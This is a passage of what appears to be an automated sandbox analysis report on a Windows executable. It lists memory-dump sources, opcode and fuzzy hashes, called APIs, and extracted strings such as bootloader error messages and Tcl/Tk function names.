                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                              • Instruction ID: b76cb370c470fc96ded75504d93db2112d2cecd612c9ddfca2986411f05b1b73
                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                              • Instruction Fuzzy Hash: F9516F76E18A5382F724CB29C04522833A1EB49B6CF244135CE6D977E4EF7AE863C740
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                              • Instruction ID: 493b0c6267a4f75bcfc85133cf270babf3ae36e099b9106e2ef8fddf9555a985
                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                              • Instruction Fuzzy Hash: 69517376E1965286E724CF29C05823937A1EB48B9CF284131CE5D977E9EF3AE843C740
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                              • Instruction ID: 4bec9240e6e48f19c8dbb77c22a1efad53b44db0f42e6a0218366711aca1ea38
                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                              • Instruction Fuzzy Hash: 4F515F76E1865286F725CB29C04023867A1EB89B6CF244131CE5D977F8EF3AE963C740
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                              • Instruction ID: fea6e6b165e5be6268620b8559e7bfae76e1d73c87cc4df6d75ef11e40598d7b
                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                              • Instruction Fuzzy Hash: C7516C36E18A9286E724CF29C05863C27A2EB48B5CF254131DE5D977E5EF3AEC52C740
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                              • Instruction ID: 1c29553e26cb077fc62d840b994082de3f4889bcc78c5aa25b32f90bf85bcb21
                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                              • Instruction Fuzzy Hash: B041A352D4D78B84EB95C91805346B82A80AF2ABACD6852B4DDBDD33E7ED0D7987C240
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                              • String ID:
                                                              • API String ID: 588628887-0
                                                              • Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                              • Instruction ID: e888a8199714cb3c932029ec4587c1acaff8f4785362eed63bd30ef97c2fd031
                                                              • Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                              • Instruction Fuzzy Hash: 1F41C262B14A5682EF48DF2ADA1417973A5FB8CFD4B099436DE1DD7BA8EE3DD0418300
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                              • Instruction ID: ae8ad5c97bb5464c5e266cba4ba9e64af3d46362b7ea698ca6aa30f4ee6d02e6
                                                              • Opcode Fuzzy Hash: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                              • Instruction Fuzzy Hash: CF318032F19B8341E724DB25648013E7A95AB88B94F144238EAAD93BE5EF7CD012C704
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                              • Instruction ID: 648b8d712d351e1a6074162570167708ac3d486c305072b3993aeb98fe60fb98
                                                              • Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                              • Instruction Fuzzy Hash: 6BF068717286968EEB948F29A50263977D0F70C3C0F80D039F59DC3B54DA7C90508F04
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                              • Instruction ID: 7c3e44c70bb5d2cc4f23ce742997cf9f11ac162c274fc72e2286782315153f7e
                                                              • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                              • Instruction Fuzzy Hash: A4A00125918827D4EB588B04A9A413A6621BB58744B402031D02EC19F0AF2CA8018310
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                              • API String ID: 190572456-3427451314
                                                              • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                              • Instruction ID: 2ea597ca4e0d9f415ebdc688b2cc56dbad77a80652fe467aaab850adfbfd1a4a
                                                              • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                              • Instruction Fuzzy Hash: 20E17268E1AB4395FB55DB14AAA41B863A5AF1C7D4F946436C83EC26F4FF3CB5488300
                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6FB1E7C97,?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E782C
                                                                • Part of subcall function 00007FF6FB1E26C0: MessageBoxW.USER32 ref: 00007FF6FB1E2736
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                              • API String ID: 1662231829-930877121
                                                              • Opcode ID: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                              • Instruction ID: 2a2c100b0747b2f2dabfa6ddf9d6b2e70d0fd2179999a184dedd6c9b8e97e886
                                                              • Opcode Fuzzy Hash: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                              • Instruction Fuzzy Hash: 33416F11F2964381FB60EB24E9616BE6251AF9C7C8F545031DA6EC2AF9FE6CF108C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                              • String ID: P%
                                                              • API String ID: 2147705588-2959514604
                                                              • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                              • Instruction ID: 3dc3369830e126535fdb4c2228ed0b968f663e87a8ca85238e0f76eaa7092272
                                                              • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                              • Instruction Fuzzy Hash: 5C51E7266147A286D7349F22B4681BEB7A1F798BA5F004121EBDF83794EF3CD145CB10
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: -$:$f$p$p
                                                              • API String ID: 3215553584-2013873522
                                                              • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                              • Instruction ID: 171ece82a85c632ae3cf06dfb3decd6baba0ac50736b311000544eaa46118e52
                                                              • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                              • Instruction Fuzzy Hash: C012B571E0C24386FB24DB15D0542797692FB8879CF944136D6AA87AE8FF3CE590CB04
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: f$f$p$p$f
                                                              • API String ID: 3215553584-1325933183
                                                              • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                              • Instruction ID: e6ac04964fe0ad5565ba27a5d55502366ca34db5c8ade0f5475fa164ea720470
                                                              • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                              • Instruction Fuzzy Hash: EF129462E0C14386FB20DF54E0587B97292FB88758F984135D6AA876E4FF7DE980CB50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2030045667-3659356012
                                                              • Opcode ID: 6c2c96a29d60f432f2b448254d07b01eb9fab63d38ba2328369ba170bbdd7169
                                                              • Instruction ID: 6f7834727ce1eb4a92e1931a37700c06773c20887ed0693cc16d563ca2b5f628
                                                              • Opcode Fuzzy Hash: 6c2c96a29d60f432f2b448254d07b01eb9fab63d38ba2328369ba170bbdd7169
                                                              • Instruction Fuzzy Hash: 85417C22E0864382FB20DB22A9545BEA390BB48BC8F444431ED6E87BF5FE2CF4548740
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2030045667-3659356012
                                                              • Opcode ID: 7a6b146adfcb98e650bee18aa77db2fbb1ea6c7dd5ba6714b17be4e0a6b4b0dd
                                                              • Instruction ID: 84ecfcd80d7305998b3be636ada93a78a111f2fbd3bdddcd1f2a45b457d3d257
                                                              • Opcode Fuzzy Hash: 7a6b146adfcb98e650bee18aa77db2fbb1ea6c7dd5ba6714b17be4e0a6b4b0dd
                                                              • Instruction Fuzzy Hash: 69414722E0864382FB20DB15A9505BE63A0AF4DBD8F545432DA6E87AF5FE7CF5518700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                              • Instruction ID: 794c82b303f5e3d5b7cc6c91b9e4080ab274db0d023e0e03f98114b72fe0fbab
                                                              • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                              • Instruction Fuzzy Hash: D8D14C32E087468AEB60DB6594403AE77A0FB59B9CF100135EA6D97FA5EF38F491C740
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED06D
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED07B
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED0A5
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED113
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED11F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                              • Instruction ID: a5c4d9d5d5bab91ca0f4aeb956cdfdd91acae7b12b79009de08f85f301f8d72b
                                                              • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                              • Instruction Fuzzy Hash: 43317A35B1AA4B81EB21DB12A80467D6294BB0CBA8F5A0535DD3D87BE0FE3CF4468300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
